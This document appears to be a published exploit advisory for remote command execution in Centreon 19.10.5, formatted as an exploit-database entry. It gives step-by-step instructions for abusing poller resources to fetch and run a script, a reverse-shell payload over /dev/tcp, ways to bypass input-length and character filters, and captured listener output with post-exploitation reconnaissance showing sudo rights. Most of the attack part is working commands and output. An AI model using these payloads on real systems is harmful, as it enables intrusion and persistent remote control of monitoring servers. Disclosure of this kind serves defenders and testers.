Share
# Exploit Title: Centreon 19.10.5 - Remote Command Execution  
# Date: 2020-01-27  
# Exploit Author: Fabien AUNAY, Omri BASO  
# Vendor Homepage: https://www.centreon.com/  
# Software Link: https://github.com/centreon/centreon  
# Version: 19.10.5  
# Tested on: CentOS 7  
# CVE : -  
  
###########################################################################################################  
Centreon 19.10.5 Remote Command Execution Resources  
  
Trusted by SMBs and Fortune 500 companies worldwide.  
An industry reference in IT Infrastructure monitoring for the enterprise.  
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.  
Presence in Toronto and Luxembourg.  
Deployed in diverse sectors:  
- IT & telecommunication  
- Transportation  
- Government  
- Heath care  
- Retail  
- Utilities  
- Finance & Insurance  
- Aerospace & Defense  
- Manufacturing  
- etc.  
  
It is possible to call binaries not only in default $USER$ path by adding Poller's Resources.  
By adding two entries it is possible to trigger a download exec reverse shell.  
Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default.  
  
Steps:  
Objective 1 : Add Download Resource  
Objective 2 : Add Exec Resource  
Objective 3 : Create your both commands check  
Objective 4 : Create your services and link them with a host  
  
Restart the Central.  
  
###########################################################################################################  
  
# Objective 1 : Add Download Resource  
- Configuration/Pollers/Resources  
  
- Problem:  
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=  
Illegal Macro Output Characters : `~$^&"|'<>  
Maximum client side input size limit: 35  
  
- Information:  
Read Centreon documentation:  
To install Centreon software from the repository, you should first install the centreon-release package,  
which will provide the repository file. Some may not have the wget package installed.  
If not perform the following : yum install wget  
  
Solution 1: Remove restriction in Configuration/Pollers/Engine configuration  
Solution 2: Modify input size inspector in client side <input> size="250"  
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh  
  
  
# Objective 2 : Add Exec Resource  
- Configuration/Pollers/Resources  
  
- Problem:  
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=  
Illegal Macro Output Characters : `~$^&"|'<>  
Maximum client side input size limit: 35  
  
Solution: Use a custom payload -> bash /tmp/x.sh  
  
  
# Objective 3 : Create your both commands check with your resources $xxx$ without arguments  
# Objective 4 : Create your services and link them with a host  
  
  
POC:  
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121  
  
python -m SimpleHTTPServer 8080  
Serving HTTP on 0.0.0.0 port 8080 ...  
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -  
  
  
nc -lvnp 1234  
Ncat: Version 7.50  
Ncat: Listening on :::1234  
Ncat: Listening on 0.0.0.0:1234  
Ncat: Connection from 127.0.0.1.  
Ncat: Connection from 127.0.0.1:43128.  
id  
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)  
sudo -l  
Matching Defaults entries for centreon-engine on centreon-lab:  
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,  
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",  
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",  
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",  
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",  
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",  
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty  
  
User centreon-engine may run the following commands on centreon-lab:  
(root) NOPASSWD: /sbin/service centreontrapd start  
(root) NOPASSWD: /sbin/service centreontrapd stop  
(root) NOPASSWD: /sbin/service centreontrapd restart  
(root) NOPASSWD: /sbin/service centreontrapd reload  
(root) NOPASSWD: /usr/sbin/service centreontrapd start  
(root) NOPASSWD: /usr/sbin/service centreontrapd stop  
(root) NOPASSWD: /usr/sbin/service centreontrapd restart  
(root) NOPASSWD: /usr/sbin/service centreontrapd reload  
(root) NOPASSWD: /sbin/service centengine start  
(root) NOPASSWD: /sbin/service centengine stop  
(root) NOPASSWD: /sbin/service centengine restart  
(root) NOPASSWD: /sbin/service centengine reload  
(root) NOPASSWD: /usr/sbin/service centengine start  
(root) NOPASSWD: /usr/sbin/service centengine stop  
(root) NOPASSWD: /usr/sbin/service centengine restart  
(root) NOPASSWD: /usr/sbin/service centengine reload  
(root) NOPASSWD: /bin/systemctl start centengine  
(root) NOPASSWD: /bin/systemctl stop centengine  
(root) NOPASSWD: /bin/systemctl restart centengine  
(root) NOPASSWD: /bin/systemctl reload centengine  
(root) NOPASSWD: /usr/bin/systemctl start centengine  
(root) NOPASSWD: /usr/bin/systemctl stop centengine  
(root) NOPASSWD: /usr/bin/systemctl restart centengine  
(root) NOPASSWD: /usr/bin/systemctl reload centengine  
(root) NOPASSWD: /sbin/service cbd start  
(root) NOPASSWD: /sbin/service cbd stop  
(root) NOPASSWD: /sbin/service cbd restart  
(root) NOPASSWD: /sbin/service cbd reload  
(root) NOPASSWD: /usr/sbin/service cbd start  
(root) NOPASSWD: /usr/sbin/service cbd stop  
(root) NOPASSWD: /usr/sbin/service cbd restart  
(root) NOPASSWD: /usr/sbin/service cbd reload  
(root) NOPASSWD: /bin/systemctl start cbd  
(root) NOPASSWD: /bin/systemctl stop cbd  
(root) NOPASSWD: /bin/systemctl restart cbd  
(root) NOPASSWD: /bin/systemctl reload cbd  
(root) NOPASSWD: /usr/bin/systemctl start cbd  
(root) NOPASSWD: /usr/bin/systemctl stop cbd  
(root) NOPASSWD: /usr/bin/systemctl restart cbd  
(root) NOPASSWD: /usr/bin/systemctl reload cbd